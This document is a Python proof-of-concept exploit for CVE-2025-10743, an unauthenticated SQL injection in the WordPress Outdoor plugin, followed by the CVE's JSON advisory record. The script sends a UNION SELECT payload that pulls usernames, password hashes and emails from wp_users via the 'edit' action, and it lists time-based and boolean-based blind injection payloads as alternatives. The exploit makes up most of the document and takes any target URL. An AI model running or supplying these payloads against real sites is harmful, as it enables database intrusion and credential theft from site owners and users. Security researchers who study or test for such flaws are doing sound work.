CVE-2025-10743

# CVE-2025-10743 - Outdoor Plugin SQL Injection PoC # Vulnerability: Unauthenticated SQL Injection via 'edit' action # Affected: WordPress Outdoor Plugin <= 1.3.2 import requests import sys target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" # Step 1: Test for SQL injection vulnerability # The 'edit' action parameter is vulnerable to SQL injection payload = "1 UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE ID=1-- -" # Construct the malicious URL # Based on the vulnerable code in actions.php line ~73 injection_url = f"{target_url}/?action=edit&id={payload}" print(f"[*] Target: {target_url}") print(f"[*] Testing SQL injection via 'edit' action...") try: response = requests.get(injection_url, timeout=10) if response.status_code == 200: print(f"[+] Request successful (Status: {response.status_code})") # Check if response contains extracted data if "user_login" in response.text or "admin" in response.text.lower(): print("[+] SQL Injection confirmed! Sensitive data may be exposed.") print(f"[+] Response length: {len(response.text)}") else: print("[-] No obvious data leakage detected, try blind injection techniques") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Alternative: Time-based blind SQL injection # payload = "1 AND SLEEP(5)-- -" # Use this if UNION-based injection is filtered # Alternative: Boolean-based blind injection # payload = "1 AND 1=1-- -" # True condition # payload = "1 AND 1=2-- -" # False condition # Compare responses to extract data character by character

{"cve": {"id": "CVE-2025-10743", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:41.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Outdoor plugin for WordPress is vulnerable to SQL Injection via the 'edit' action in all versions up to, and including, 1.3.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/outdoor/trunk/actions.php#L73", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/outdoor/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6038accc-98ac-496c-9c53-ec06b2045324?source=cve", "source": "[email protected]"}]}}